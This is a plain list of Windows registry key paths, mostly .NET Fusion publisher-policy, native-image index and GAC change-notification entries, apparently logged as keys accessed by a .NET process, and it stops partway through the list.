HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegAsm.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6a\68a8ac6a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
